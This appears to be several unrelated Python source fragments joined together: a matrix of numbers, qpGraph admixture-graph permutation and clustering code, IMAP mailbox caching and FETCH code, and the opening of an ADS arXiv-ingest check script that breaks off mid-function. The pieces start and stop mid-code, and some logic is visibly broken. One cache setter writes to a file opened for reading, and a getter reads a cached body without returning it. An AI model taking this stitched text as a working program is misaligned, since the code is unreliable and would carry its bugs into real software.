[-0.999773, 0.0079918, 0.0197854],
[0.00864136, 0.999419, 0.0329623],
[-0.0195105, 0.0331255, -0.999262],
],
),
(
[
[-0.773738, 0.630074, 0.0658454],
[-0.622848, -0.737618, -0.260731],
[-0.115711, -0.242749, 0.963163],
],
[
[-0.740005, 0.000855199, -0.672604],
[-0.0106008, 0.99986, 0.0129348],
[0.672521, 0.0167018, -0.739892],
],
),
(
[
[0.969039, -0.00110643, -0.246907],
[-0.121454, 0.868509, -0.480564],
[0.214973, 0.495673, 0.841484],
],
[
[-0.981168, -0.150714, 0.120811],
[0.172426, -0.401504, 0.89948],
[-0.0870583, 0.903372, 0.419929],
],
),
(
[
[0.589015, 0.80692, 0.0440651],
[-0.806467, | |
get all the nodes
nodes = local_tree.findall('.//*')
for node in nodes:
# skip non-leaf nodes
if len(node) == 0 and node.get('admix') != '1':
graph += "label\t{node}\t{node}\n".format(node=node.tag)
# build the list of edges
graph += self.export_qpgraph_node(local_tree)
return graph
def export_qpgraph_node(self, root_tree, parent_node=None):
    """
    Recursively export all the edges in the graph.

    :param root_tree: the full ElementTree (searched to find the second
        parent of admixture nodes)
    :param parent_node: node whose children are exported; defaults to
        the tree root
    :return: qpGraph edge/admix definitions as a string
    """
    graph = ""
    if parent_node is None:
        parent_node = root_tree.getroot()
    for child_node in list(parent_node):
        # skip nodes already emitted by the admixture handling below
        if child_node.get('printed') != '1':
            # is this an admixture node or a normal node
            # (a tag appearing under more than one parent is admixed)
            matches = root_tree.findall('.//' + child_node.tag + '/..')
            if len(matches) > 1:
                # admixture branch
                parent1, parent2 = matches
                middle1 = child_node.tag + 'a'
                middle2 = child_node.tag + 'b'
                code1 = self.hash_text(middle1)
                code2 = self.hash_text(middle2)
                # don't admix from a bifurcating node; intermediate nodes to accommodate drift
                graph += "edge\t{code}\t{parent}\t{middle}\n".format(code=code1, parent=parent1.tag, middle=middle1)
                graph += "edge\t{code}\t{parent}\t{middle}\n".format(code=code2, parent=parent2.tag, middle=middle2)
                # now admix from the two middle nodes (fixed 50/50 split)
                graph += "admix\t{child}\t{parent1}\t{parent2}\t50\t50\n".format(parent1=middle1, parent2=middle2,
                                                                                 child=child_node.tag)
                # flag both nodes so we don't export them twice
                parent1.find(child_node.tag).set('printed', '1')
                parent2.find(child_node.tag).set('printed', '1')
            else:
                # regular branch
                code = self.hash_text(child_node.tag)
                graph += "edge\t{code}\t{parent}\t{child}\n".format(code=code, parent=parent_node.tag,
                                                                    child=child_node.tag)
        # leaf nodes
        if len(child_node) > 0:
            # now convert the children
            graph += self.export_qpgraph_node(root_tree, child_node)
    return graph
@staticmethod
def hash_text(text, length=7):
"""
Generate a unique key by hashing a string
"""
return hashlib.sha1(text).hexdigest()[0:length]
@staticmethod
def new_label(root_tree, admix=False):
"""
Return a new label for a node
"""
all_nodes = root_tree.findall('.//*')
if admix:
num = len([node for node in all_nodes if node.get('admix') == '1']) / 2
else:
num = len([node for node in all_nodes if node.get('internal') == '1' and node.get('admix') != '1'])
return '{pre}{num}'.format(pre='a' if admix else 'n', num=num+1)
def print_newick_tree(self, root_tee):
    """
    Convert an ElementTree into a ladderized Newick tree.

    :param root_tee: the ElementTree to convert
    :return: the Newick string with admix node labels renumbered in
        first-occurrence order
    """
    newick = self.export_newick_tree(root_tee.getroot())
    # load into Phylo so we can sort the tree (i.e. ladderize)
    tree = Phylo.read(StringIO(newick), 'newick')
    tree.ladderize()
    # export the tree back to a string
    fout = StringIO()
    Phylo.write(tree, fout, 'newick')
    newick = fout.getvalue()
    # remove the branch lengths
    newick = newick.replace(':0.00000', '').strip()
    # get the order of admix nodes in the tree (first occurrence order)
    order = list(OrderedDict.fromkeys(re.findall('a\d+', newick)))
    # normalise the node numbering (via a temporary 'n' prefix)
    for i, old in enumerate(order):
        newick = newick.replace(old, 'n%s' % (i+1))
    # switch the temporary 'n' prefix back to 'a' (to preserve the existing cache)
    newick = re.sub(r'n([0-9]+)', r'a\1', newick)
    return newick
def export_newick_tree(self, parent_node):
    """
    Serialise an ElementTree node (and its subtree) into Newick format.

    Children are recursed into and sorted by tag so the output is
    stable; internal/root labels ('nN' or 'R') are suppressed.
    """
    # a leaf is rendered simply as its tag name
    if len(parent_node) == 0:
        return parent_node.tag
    subtrees = sorted(
        (child.tag, self.export_newick_tree(child)) for child in parent_node
    )
    if re.match('n[0-9]+|R', parent_node.tag):
        label = ''
    else:
        label = parent_node.tag
    body = ','.join(newick for _tag, newick in subtrees)
    return '(' + body + ')%s' % label
def find_graph(self):
    """
    Build and test all possible trees and graphs.

    Seeds the search with a minimal two-leaf tree (outgroup + first
    node) and recursively places the remaining nodes.
    """
    self.log('INFO: Starting list %s' % self.nodes)
    # setup a simple 2-node tree
    root = ElemTree.Element(self.root_node)
    tree = ElemTree.ElementTree(root)
    for tag in (self.outgroup, self.nodes[0]):
        ElemTree.SubElement(root, tag)
    # recursively add all the other nodes
    self.recurse_tree(tree, self.nodes[1], self.nodes[2:])
class NodeUnplaceable(Exception):
    """Raised when a node cannot be placed in the graph without
    exceeding the outlier threshold."""
    pass
def permute_qpgraph(par_file, log_file, dot_path, pdf_path, nodes, outgroup, exhaustive=False, verbose=False, nthreads=1):
    """
    Find the best fitting graph for a given set of nodes, by permuting all possible graphs.

    :param nodes: node names to place in the graph
    :param outgroup: name of the outgroup node
    :param exhaustive: if True, keep searching all remaining starting
        orders even after a solution is found
    :return: the set of unique solutions found
    """
    # clean up the log file
    if os.path.exists(log_file):
        os.remove(log_file)
    # instantiate the class
    pq = PermuteQpgraph(par_file, log_file, dot_path, pdf_path, nodes, outgroup, exhaustive, verbose, nthreads)
    # get all the permutations of possible node orders
    all_nodes_perms = list(itertools.permutations(nodes, len(nodes)))
    # randomise the list of starting orders
    random.shuffle(all_nodes_perms)
    pq.log("INFO: There are {:,} possible starting orders for the given nodes.".format(len(all_nodes_perms)))
    pq.log("INFO: Performing %s search." % ("an exhaustive" if pq.exhaustive_search else "a heuristic"))
    # keep looping until we find a solution, or until we've exhausted all possible starting orders
    while not pq.solutions or pq.exhaustive_search:
        try:
            # find the best fitting graph for this starting order
            pq.find_graph()
        except NodeUnplaceable as error:
            # log the error
            pq.log(error)
        try:
            # try starting with a different node order
            pq.nodes = list(all_nodes_perms.pop())
        except IndexError:
            # we've run out of node orders to try
            if not pq.solutions:
                pq.log("ERROR: Cannot resolve the graph from any permutation of the given nodes.")
            break
    pq.log("FINISHED: Found {:,} unique solution(s) from a total of {:,} unique graphs!".format(len(pq.solutions),
                                                                                                len(pq.tested_graphs)))
    return pq.solutions
class ClusterQpgraph():
    """
    Pairwise comparison of fitted qpGraph graphs: loads the .dot files,
    computes a symmetric graph-similarity distance matrix, and caches it
    to disk for clustering. Written for Python 2 (print statements).
    """

    def __init__(self, graph_names, log_file, dot_path, csv_file, mtx_file, verbose, nthreads):
        """
        Initialise the object attributes
        """
        self.graph_names = graph_names
        self.log_file = log_file
        self.dot_path = dot_path
        self.csv_file = csv_file
        self.mtx_file = mtx_file
        self.verbose = verbose
        self.nthreads = nthreads
        # graph-tool Graph objects, populated lazily by build_matrix()
        self.graphs = []
        # NOTE(review): this unconditionally overrides the verbose
        # parameter set just above — looks like a leftover debug flag
        self.verbose = True
        # open the file for writing
        self.log_handle = open(log_file, 'a')

    def log(self, message):
        """
        Handle message logging to file/stdout.
        """
        # send message to the log file (Python 2 print-chevron syntax)
        print >> self.log_handle, message
        self.log_handle.flush()
        if self.verbose:
            # echo to stdout
            print message
            sys.stdout.flush()

    @staticmethod
    def parse_dot_file(path):
        """
        The graph-tool library doesn't like the header attributes used by qpGraph, so we need to filter them out
        """
        with open(path, 'r') as fin:
            rows = fin.readlines()
        # exclude lines 2-4, which contain the problematic metadata
        # (keeps the first row and everything from row index 5 onwards)
        text = "".join(rows[:1] + rows[5:])
        return StringIO(text)

    def calculate_distance(self, args):
        """
        Calculate the similarity distance for two graphs.
        See https://graph-tool.skewed.de/static/doc/topology.html#graph_tool.topology.similarity
        """
        # extract the tuple of arguments
        i, j = args
        # calculate the distance scores between graph pairs (scores are not symmetric; i.e. A->B != B->A)
        d1 = similarity(self.graphs[i], self.graphs[j], distance=True)
        d2 = similarity(self.graphs[j], self.graphs[i], distance=True)
        # enforce symmetry in the matrix by taking the max distance
        dist = max(d1, d2)
        return i, j, dist

    def build_matrix(self):
        """
        Build a symmetrical distance matrix for all graphs.
        """
        # instantiate all the graph objects
        for graph_name in self.graph_names:
            dot_file = self.dot_path + '-{name}.dot'.format(name=graph_name)
            graph = load_graph(self.parse_dot_file(dot_file), fmt='dot')
            self.graphs.append(graph)
        # how many graphs are we comparing
        size = len(self.graph_names)
        # initialise the distance matrix
        dist_matrix = np.zeros([size, size])
        # get all the i,j pairs for one diagonal half
        idxs = [(i, j) for i in range(1, size) for j in range(i)]
        self.log("INFO: Calculating distance matrix for {:,} graph pairs".format(len(idxs)))
        if self.nthreads > 1:
            # we need to buffer the results to use multi-threading
            pool = mp.ProcessingPool(self.nthreads)
            results = pool.map(self.calculate_distance, idxs)
        else:
            # compute distances without multi-threading
            results = []
            for i, j in idxs:
                result = self.calculate_distance((i, j))
                results.append(result)
        # populate the distance matrix (mirror into both halves)
        for i, j, dist in results:
            dist_matrix[i, j] = dist_matrix[j, i] = dist
        # save the matrix
        np.save(self.mtx_file, dist_matrix)
        return dist_matrix

    def get_matrix(self):
        """
        Load the distance matrix from file, or build it if necessary.
        """
        try:
            # load the distance matrix from file
            dist_matrix = np.load(self.mtx_file)
            self.log("INFO: Loaded distance matrix from file %s" % self.mtx_file)
        except IOError:
            # file doesn't exist, so build it
            dist_matrix = self.build_matrix()
        return dist_matrix
def cluster_qpgraph(graph_names, dot_path, log_file, pdf_file, csv_file, mtx_file, verbose=False, nthreads=1):
    """
    Compare all fitting graphs and compute the number of clusters.

    Builds (or loads) the pairwise graph distance matrix, performs
    Ward-linkage hierarchical clustering, renders a dendrogram PDF and
    writes a graph-to-cluster CSV.
    """
    # clean up the log file
    if os.path.exists(log_file):
        os.remove(log_file)
    # instantiate the class
    cq = ClusterQpgraph(graph_names, log_file, dot_path, csv_file, mtx_file, verbose, nthreads)
    cq.log("INFO: There are {:,} graphs to compare".format(len(set(graph_names))))
    # get the distance matrix
    dist_matrix = cq.get_matrix()
    cq.log("INFO: Calculating the hierarchical clusters (linkage matrix)")
    # calculate the hierarchical clusters, using Ward's minimum variance method
    # https://en.wikipedia.org/wiki/Ward%27s_method
    Z = linkage(dist_matrix, method='ward')
    # print a dendrogram of the clusters
    pprint_dendrogram(Z, truncate_mode='lastp', p=10, leaf_rotation=90.,
                      leaf_font_size=12., show_contracted=True, pdf=pdf_file)
    cq.log("INFO: Printed hierarchical clustering dendrogram %s" % pdf_file)
    # automatically assign graphs to clusters
    # https://joernhees.de/blog/2015/08/26/scipy-hierarchical-clustering-and-dendrogram-tutorial/#Inconsistency-Method
    clusters = fcluster(Z, t=10, criterion='inconsistent', depth=10)
    cq.log("INFO: Found %s clusters using inconsistency criterion (t=%s)" % (len(set(clusters)), 10))
    # write the graph -> cluster assignments to CSV ('wb' is Python 2)
    with open(csv_file, 'wb') as fout:
        csv_writer = csv.writer(fout)
        csv_writer.writerow(['Graph', 'Cluster'])
        for graph, cluster in izip(graph_names, clusters):
            csv_writer.writerow([graph, cluster])
    cq.log("INFO: Saved clusters to file %s" % csv_file)
if __name__ == "__main__":
from time import time
from datetime import timedelta
start = time()
if len(sys.argv) != 4:
print "Error: required params"
quit()
func = sys.argv[1]
group = sys.argv[2]
dataset = sys.argv[3]
if func == 'simulated':
# -------------------------
# -- SIMULATED TEST DATA --
# -------------------------
nodes = ['A', 'X', 'B', 'C']
outgroup = 'Out'
par_file = 'permute/simulated.par'
log_file = 'permute/simulated.log'
dot_path = | |
if self.cachedir and what.startswith('BODY[') and what[5] in '123456789T]':
try:
open(os.path.join(self.cachedir,'%d_body_%s' % (uid,what[5:-1].replace('.','_')))).read()
except OSError:
return None
elif self.cachedir and what.startswith('BINARY[') and what[5] in '123456789T]':
try:
return open(os.path.join(self.cachedir,'%d_binary_%s' % (uid,what[5:-1].replace('.','_')))).read()
except OSError:
return None
else:
k = (uid, what)
return self.cache.get(k,None)
except:
print "CACHE ERROR?"
raise
self.cache_start( True )
return None
def set_cache( self, uid, what, data ):
try:
if self.cachedir and what.startswith('BODY[') and what[5] in '123456789T]':
try:
open(os.path.join(self.cachedir,'%d_body_%s' % (uid,what[5:-1].replace('.','_')))).write(data)
except OSError:
return None
elif self.cachedir and what.startswith('BINARY[') and what[5] in '123456789T]':
try:
return open(os.path.join(self.cachedir,'%d_binary_%s' % (uid,what[5:-1].replace('.','_')))).write(data)
except OSError:
return None
else:
k = (uid, what)
self.cache[k]=data
#print "Set cache key",`k`,"to",`self.cache[k]`
except:
print "CACHE ERROR?"
raise
self.cache_start( True )
def __len__(self):
    """Message count (EXISTS); blocks until the server has reported it."""
    self.uidvalidity()
    count = self._exists
    # Keep pumping the connection until an EXISTS count arrives.
    while count is None:
        self._imap.wait_ready()
        self._imap.fetch()
        count = self._exists
    return count
def index( self, uid ):
    """Resolve *uid* via self.uid(), raising if the message is absent."""
    seqno = self.uid( uid )
    if seqno is not None:
        return seqno
    raise infotrope.base.connection.exception("Message %d not in mailbox." % uid)
def __getitem__(self,key):
    """Return the message object for *key* (coerced to int)."""
    return self.get_message( int(key) )
def fetch( self, msg, what, extend=False, nofetch=False, wait=True ):
    """Fetch items *what* for message *msg*.

    :param msg: message object; msg._uid identifies it.
    :param what: iterable of FETCH item names.
    :param extend: if True, fetch a 25-UID aligned window around the
        message so neighbouring messages get primed in the same command.
    :param nofetch: passed to real_fetch; resolve from cache only.
    :param wait: block until the issued FETCH commands complete.
    """
    try:
        # Temporary fake MODSEQ (hundredths of a second since the epoch)
        # in effect while this fetch is in flight; cleared in finally.
        self._pretend_modseq = long(time.time()*100)
        sequence_start = int(msg._uid)
        sequence_end = sequence_start
        if extend:
            # Align the window start to a multiple of 25, spanning 25 UIDs.
            sequence_start -= sequence_start % 25
            sequence_end = sequence_start + 25
            if sequence_start == 0:
                sequence_start = 1  # UIDs are 1-based
            self.uid( sequence_start )
            self.uid( sequence_end )
        else:
            self.uid( sequence_start )
        stuff = self.real_fetch( sequence_start, sequence_end, what, nofetch )
        if stuff is not None and wait:
            # stuff is the (tags, mutables) pair from fetch_send_cmd.
            self.fetch_wait( stuff[0], stuff[1] )
    finally:
        self._pretend_modseq = None
def convert_sequence_then( self, action, seqs, *args ):
    """Resolve sequence numbers *seqs* to UIDs, then call action(uids, *args).

    Resolution may need pages of the seqno cache fetched from the server,
    so the work is packaged as a re-entrant continuation: seqno_prime()
    re-invokes step() once the needed cache page has arrived.
    """
    class seqconverter:
        def __init__( self, mbx, seqs, action, args ):
            self.action = action
            self.args = args
            self.seqs = seqs
            self.uids = []   # accumulated UIDs, appended as seqs resolve
            self.mbx = mbx
        def step( self, *args ):
            while len( self.seqs ):
                s = self.seqs.pop()
                # Silently drop out-of-range sequence numbers.
                if s > len(self.mbx):
                    continue
                if s <= 0:
                    continue
                # seqno_cache is paged in blocks of max_pull entries;
                # 'start' is the page base. NOTE(review): '/' here is
                # Python 2 integer division.
                start = ( s / max_pull ) * max_pull
                if start not in self.mbx.seqno_cache:
                    # Page not cached yet: push s back, prime the cache,
                    # and resume from step() when the data arrives.
                    self.seqs.append( s )
                    self.mbx.seqno_prime( s, then=self.step )
                    return
                if len(self.mbx.seqno_cache[start]) <= (s-start):
                    # Page present but still filling: retry later.
                    self.seqs.append( s )
                    self.mbx.seqno_prime( s, then=self.step )
                    return
                self.uids.append( self.mbx.seqno_cache[start][s-start] )
            # Everything resolved; invoke the continuation.
            self.action( self.uids, *self.args )
    s = seqconverter( self, seqs, action, args )
    s.step()
def prefetch( self, uidrange, then=None ):
    """Issue a summary fetch for *uidrange* without waiting on completion.

    :param uidrange: UID range/list handed straight to real_fetch.
    :param then: optional callback; notified when the first command's tag
        completes, or called immediately with (None, None, None) when
        nothing needed fetching.
    :return: the (tags, mutables) pair from real_fetch, or None/falsy
        when everything was already satisfied from cache.

    Cleanup vs. the original: removed the unused local ``ndone`` and
    dead commented-out debug prints.
    """
    tag = self.real_fetch( uidrange, None, message.summary )
    if tag and then:
        # Fire *then* when the first issued command completes.
        infotrope.core.notify_all( self.server().env, tag[0], then )
    self._imap.flush()
    if not tag and then:
        # Nothing to fetch: invoke the callback right away.
        then( None, None, None )
    return tag
def real_fetch( self, sequence_range, sequence_end, what, nofetch=False ):
rwhat = {}
mutables = []
if sequence_end is not None:
sequence_range = range(sequence_range,sequence_end+1)
for uid in sequence_range:
if self.uid( uid ) is not None or uid >= self._uid_next:
autofeed = {}
for x in what:
from_cache = False
condfetch = ''
k = (uid, x)
try:
data = self.cache.get( k )
self._imap.log("Cached: %s = %s" % (`k`,`data`))
if data is not None:
autofeed['UID'] = str(uid)
autofeed[x] = data
from_cache = True
if x=='FLAGS':
self._imap.log("Asked to fetch FLAGS. Have %s in cache." % (data))
from_cache = False
mseq = self.cache.get((uid, self._last_modseq_key),None)
self._imap.log("LASTMODSEQ is %s" % (`mseq`))
if mseq is not None:
condfetch = long(mseq)
mutables.append( uid )
if condfetch >= long(self._highest_modseq):
self._imap.log("We have newer")
from_cache = True
elif uid <= self._highwater_uid:
self._imap.log("Below high water mark")
if condfetch <= long(self._highwater_modseq):
self.cache[(uid,self._last_modseq_key)] = self._highwater_modseq
from_cache = True
elif uid <= self._highwater_uid:
self._imap.log("No modseq, but below highwater")
self.cache[(uid, self._last_modseq_key)] = self._highwater_modseq
from_cache = True
elif x.startswith('ANNOTATION'):
from_cache = False
fk = x[0:x.rindex('\0')] + '\0' + 'MODSEQ-FETCH'
nk = x[0:x.rindex('\0')] + '\0' + 'MODSEQ-CHANGED'
if fk in self.cache:
fm = long(self.cache[fk])
if fm > long(self._highest_modseq):
from_cache = True
if nk in self.cache:
nm = long(self.cache[fk])
if fm > nm:
from_cache = True
else:
condfetch = min( nm, long(self._highest_modseq) )
else:
condfetch = long(self._highest_modseq)
elif self.cachedir and x.startswith('BODY[') and x[5] in '1234567890T':
# Text or section
fname = '%d_body_' % (uid) + x[5:-1].replace('.','_')
try:
autofeed[x] = open(os.path.join(self.cachedir,fname),'rb').read()
autofeed['UID'] = str(uid)
from_cache = True
except:
pass
elif self.cachedir and x.startswith('BINARY[') and x[7] in '1234567890T':
# Text or section
fname = '%d_binary_' % (uid) + x[7:-1].replace('.','_')
try:
autofeed[x] = open(os.path.join(self.cachedir,fname),'rb').read()
autofeed['UID'] = str(uid)
from_cache = True
except:
pass
except:
import sys
t,v,tr = sys.exc_info()
print "Cache read failed: ", `t`, v
print "Tried reading",`k`
print "From:",`self.cache.__class__.__name__`,`dir(self.cache)`
raise v
self.cache_start( True )
if not from_cache:
if uid not in rwhat:
rwhat[uid] = {}
rwhat[ uid ][ ( x, condfetch ) ] = True
if len(autofeed):
try:
msg = self._messages[uid]
except:
msg = self.create_insert_message( uid )
for afkey in self._immediate_processors:
if afkey in autofeed:
aftok = autofeed[afkey]
self._immediate_processors[afkey]( afkey, aftok, len(aftok) )
msg.feed( autofeed )
if 'ENVELOPE' in autofeed:
try:
self.mid_cache[ msg.envelope().MessageID ] = uid
except:
self.mid_cache_start( True )
self.mid_cache[ msg.envelope().MessageID ] = uid
if len(rwhat)==0:
return
if nofetch:
return
return self.fetch_send_cmd( rwhat, mutables )
def fetch_send_cmd( self, rwhat, mutables ):
    """Group per-UID fetch requests and issue batched UID FETCH commands.

    :param rwhat: {uid: {(item, condfetch): True}} as built by real_fetch.
    :param mutables: uids whose FLAGS may change (conditional fetch).
    :return: (tags, mutables) suitable for fetch_wait().
    """
    self._imap.register( '*', self )
    tags = []
    fetching = {}   # {(items-tuple, condfetch): [uids]} - batches identical requests
    for uid,rwhat2 in rwhat.items():
        fpts = []
        condfetch = ''
        for (x,cf) in rwhat2.keys():
            if cf is not None:
                # Keep the smallest (oldest) CHANGEDSINCE value for this UID.
                # NOTE(review): '' means "no condition yet"; '' and long
                # compare via Python 2 mixed-type ordering here.
                if condfetch!='':
                    if condfetch > cf:
                        condfetch = cf
                else:
                    condfetch = cf
            if x.startswith( 'ANNOTATION' ):
                # Stored flat as 'ANNOTATION\0entry\0attribute'; rebuild the
                # structured form the protocol layer expects.
                ann = x.split('\0')
                x = [ ann[0], ( ann[1], ann[2] ) ]
                fpts += x
            else:
                fpts.append( x )
        if not self._condstore_real:
            # Server lacks CONDSTORE: never send CHANGEDSINCE.
            condfetch = ''
        if fpts is not None:
            fpts = tuple(fpts)
        ff = (fpts,condfetch)
        if ff not in fetching:
            fetching[ff] = []
        fetching[ff].append(uid)
    for fpts,uids in fetching.items():
        # fpts is the (items-tuple, condfetch) key here.
        seqs = self._make_msg_set( uids )
        if len(seqs)==0:
            continue
        tags.append( self.fetch_submit_cmd(','.join(seqs), mutables, fpts) )
    return tags,mutables
def fetch_submit_cmd(self, set, mutables, fpts, highwater=False):
    """Send a single UID FETCH for *set* (an IMAP sequence-set string).

    :param set: sequence-set string, e.g. '1:5,9'.
    :param mutables: uids with mutable FLAGS (unused here; kept by caller).
    :param fpts: (items-tuple, changedsince) pair from fetch_send_cmd.
    :param highwater: suppress the FLAGS-completion bookkeeping.
    :return: the command tag.
    """
    tag1, x1, x2 = None, None, None
    if fpts[1]!='' and self._condstore_real:
        bits = fpts[0]
        # Ensure MODSEQ is in the item list so responses carry per-message
        # mod-sequences alongside the CHANGEDSINCE condition.
        if 'MODSEQ' not in fpts[0]:
            bits = list(fpts[0]) + ['MODSEQ']
        tag1,x1,x2 = self._imap.send( 'UID FETCH', set, bits, ['CHANGEDSINCE', fpts[1]], pipeline=True, mbox=self.path() )
    else:
        bits = fpts[0]
        if self._condstore_real and 'MODSEQ' not in bits and 'FLAGS' in bits:
            bits = list(bits) + ['MODSEQ']
        tag1,x1,x2 = self._imap.send( 'UID FETCH', set, bits, pipeline=True, mbox=self.path() )
    if x1 is not None:
        # Pipelined sends normally yield a None status; a non-None,
        # non-OK status here means the command failed immediately.
        if x1.lower()!='ok':
            raise infotrope.base.connection.exception(x2)
    self._waiting += 1
    tag1.oncomplete( self.decr_waiters )
    if not highwater and 'FLAGS' in bits:
        # Remember which UIDs this FLAGS fetch covered so fetch_complete
        # can stamp their cached MODSEQ when the command finishes.
        tag1.fetched_set = set
        tag1.oncomplete( self.fetch_complete )
    return tag1
def decr_waiters( self, *args ):
    """Completion callback: one outstanding FETCH command has finished."""
    self._waiting = self._waiting - 1
def fetch_complete( self, cmd, *args ):
    """After a FLAGS fetch finishes, stamp each fetched UID's cached modseq."""
    key = self._last_modseq_key
    for uid in self._imap.decompose_set(cmd.fetched_set):
        self.cache[(uid, key)] = self._highest_modseq
def fetch_wait( self, tags, mutables ):
    """Block until the given FETCH commands complete; raise on a non-OK reply."""
    if len(tags) == 0:
        return
    t, r, s = self._imap.wait( tags )
    if r.lower() != 'ok':
        raise infotrope.base.connection.exception(s)
def _make_msg_set( self, uids, nocheck=False ):
    """Render *uids* as a minimal IMAP sequence-set (list of 'N'/'A:B' strings).

    Note: sorts *uids* in place, as the original did.
    """
    uids.sort()
    # Phase 1: coalesce consecutive UIDs into (first, last) runs, dropping
    # UIDs unknown to the mailbox (unless nocheck).
    runs = []
    run_start = run_end = None
    for u in uids:
        if run_start is None:
            if self.uid( u, nocheck=nocheck ) is None:
                continue
            run_start = run_end = u
        elif run_end == (u - 1):
            run_end = u
        else:
            runs.append( (run_start, run_end) )
            if self.uid( u, nocheck=nocheck ) is None:
                run_start = run_end = None
            else:
                run_start = run_end = u
    if run_start is not None:
        runs.append( (run_start, run_end) )
    # Phase 2: merge adjacent runs when every UID in the gap between them
    # is nonexistent - this shortens the wire representation.
    if nocheck:
        merged = runs
    else:
        merged = []
        for run in runs:
            if merged:
                gap_empty = True
                for u in range( merged[-1][1] + 1, run[0] ):
                    if self.uid( u, nocheck=nocheck ) is not None:
                        gap_empty = False
                        break
                if gap_empty:
                    merged[-1] = ( merged[-1][0], run[1] )
                    continue
            merged.append( run )
    # Phase 3: stringify.
    return [ str(a) if a == b else '%s:%s' % (a, b) for (a, b) in merged ]
def freeze( self ):
    """Suspend pending stores; returns a token that thaws on destruction."""
    class _ThawToken:
        # Token object: when garbage-collected, thaws the owning mailbox.
        def __init__( self, owner ):
            self.mbx = owner
        def __del__( self ):
            self.mbx.thaw()
    self._freeze = True
    return _ThawToken( self )
def thaw( self ):
    """Lift a freeze() and submit any stores that were queued meanwhile."""
    self._freeze = False
    self.do_pending()
def do_pending(self):
tags = []
if len(self._pending)>0:
self.uidvalidity()
for (what,uids) in self._pending.items():
x = self._pending_codes[what]
set = self._make_msg_set( uids )
if len(set)>0:
t,r,s = self._imap.send( ( 'UID STORE', ','.join(set), x[0], x[1] ), pipeline=True, mbox=self.path() )
if r is None:
t.store_uids = uids
t.store_item = x[0]
t.store_thing = x[1]
tags.append( t )
self._pending = {}
if len( tags ) > 0:
try:
| |
from adsputils import setup_logging, get_date, load_config
from myadsp import tasks, utils
from myadsp.models import KeyValue
import os
import time
import argparse
import logging
import warnings
import datetime
import gzip
import random
import json
try:
from urllib.parse import quote_plus
except ImportError:
from urlparse import quote_plus
from requests.packages.urllib3 import exceptions
# ============================= INITIALIZATION ==================================== #
# Resolve the project root relative to this file so config/logging work
# regardless of the current working directory.
proj_home = os.path.realpath(os.path.dirname(__file__))
config = load_config(proj_home=proj_home)
logger = setup_logging('run.py', proj_home=proj_home,
                       level=config.get('LOGGING_LEVEL', 'INFO'),
                       attach_stdout=config.get('LOG_STDOUT', False))
# Silence urllib3's InsecurePlatformWarning (raised on older SSL stacks).
warnings.simplefilter('ignore', exceptions.InsecurePlatformWarning)
app = tasks.app  # shared app instance from myadsp.tasks
# =============================== FUNCTIONS ======================================= #
def _arxiv_ingest_complete(date=None, sleep_delay=60, sleep_timeout=7200):
    """
    Check if new arXiv records are in Solr - run before running myADS processing
    :param date: date to check arXiv records for; default is set by days-delta from today in config (times in local time)
    :param sleep_delay: number of seconds to sleep between retries
    :param sleep_timeout: number of seconds to retry in total before timing out completely
    :return: test bibcode or None
    """
    if not date:
        date = (datetime.datetime.today() - datetime.timedelta(days=config.get('ARXIV_TIMEDELTA_DAYS'))).strftime('%Y-%m-%d')
    else:
        date = get_date(date).strftime('%Y-%m-%d')
    arxiv_file = config.get('ARXIV_UPDATE_AGENT_DIR') + '/UpdateAgent.out.' + date + '.gz'
    arxiv_records = []
    try:
        with gzip.open(arxiv_file, 'r') as flist:
            for l in flist.readlines():
                # sample line: oai/arXiv.org/0706/2491 2018-06-13T01:00:29
                arxiv_records.append(l.split()[0])
    except IOError:
        logger.warning('arXiv ingest file not found. Exiting.')
        return None
    arxiv_records.sort()
    # get the highest numbered ID
    # Pop from the (sorted) end until a record whose second-to-last path
    # segment is numeric (e.g. '0706' in oai/arXiv.org/0706/2491).
    # NOTE(review): assumes at least one such record exists, else this
    # pops an empty list and raises IndexError.
    is_new = False
    while is_new is False:
        last_record = arxiv_records.pop()
        try:
            test_new = float(last_record.split('/')[-2])
            is_new = True
        except ValueError:
            continue
    # get most recent arXiv id to test ingest later
    last_id = '.'.join(last_record.split('/')[-2:])
    total_delay = 0
    # Poll Solr until the test identifier shows up or the timeout expires.
    while total_delay < sleep_timeout:
        total_delay += sleep_delay
        r = app.client.get('{0}?q=identifier:{1}&fl=bibcode,identifier,entry_date'.format(config.get('API_SOLR_QUERY_ENDPOINT'), last_id),
                           headers={'Authorization': 'Bearer ' + config.get('API_TOKEN')})
        if r.status_code != 200:
            time.sleep(sleep_delay)
            logger.error('Error retrieving record for {0} from Solr ({1} {2}), retrying'.
                         format(last_id, r.status_code, r.text))
            continue
        numfound = r.json()['response']['numFound']
        if numfound == 0:
            # nothing found, try again after a sleep
            time.sleep(sleep_delay)
            logger.info('arXiv ingest not complete (test arXiv id: {0}). Sleeping {1}s, for a total delay of {2}s.'
                        .format(last_id, sleep_delay, total_delay))
            continue
        if numfound > 1:
            # returning this as true for now, since technically something was found
            logger.error('Too many records returned for id {0}'.format(last_id))
        logger.info('Numfound: {0} for test id {1}. Response: {2}. URL: {3}'.format(numfound, last_id,
                                                                                   json.dumps(r.json()), r.url))
        # check number of bibcodes from ingest
        # On Mondays, look back over the weekend (3 days); otherwise 1 day.
        if get_date().weekday() == 0:
            start_date = (get_date() - datetime.timedelta(days=3)).date()
        else:
            start_date = (get_date() - datetime.timedelta(days=1)).date()
        beg_pubyear = (get_date() - datetime.timedelta(days=180)).year
        q = app.client.get('{0}?q={1}'.format(config.get('API_SOLR_QUERY_ENDPOINT'),
                                              quote_plus('bibstem:arxiv entdate:["{0}Z00:00" TO NOW] '
                                                         'pubdate:[{1}-00 TO *]'.format(start_date, beg_pubyear))),
                           headers={'Authorization': 'Bearer ' + config.get('API_TOKEN')})
        logger.info('Total number of arXiv bibcodes ingested: {}'.format(q.json()['response']['numFound']))
        return last_id
    logger.warning('arXiv ingest did not complete within the {0}s timeout limit. Exiting.'.format(sleep_timeout))
    return None
def _astro_ingest_complete(date=None, sleep_delay=60, sleep_timeout=7200):
    """
    Check if new astronomy records are in Solr; run before weekly processing
    :param date: check to check against astronomy bibcode list last updated date
    :param sleep_delay: number of seconds to sleep between retries
    :param sleep_timeout: number of seconds to retry in total before timing out completely
    :return: test bibcode or None
    """
    if not date:
        date = (datetime.datetime.today() - datetime.timedelta(days=config.get('ASTRO_TIMEDELTA_DAYS')))
    else:
        date = get_date(date)
    astro_file = config.get('ASTRO_INCOMING_DIR') + 'matches.input'
    # make sure file is present and check modified datestamp on file - should be recent (otherwise contains old data)
    try:
        mod_date = datetime.datetime.fromtimestamp(os.path.getmtime(astro_file))
    except OSError:
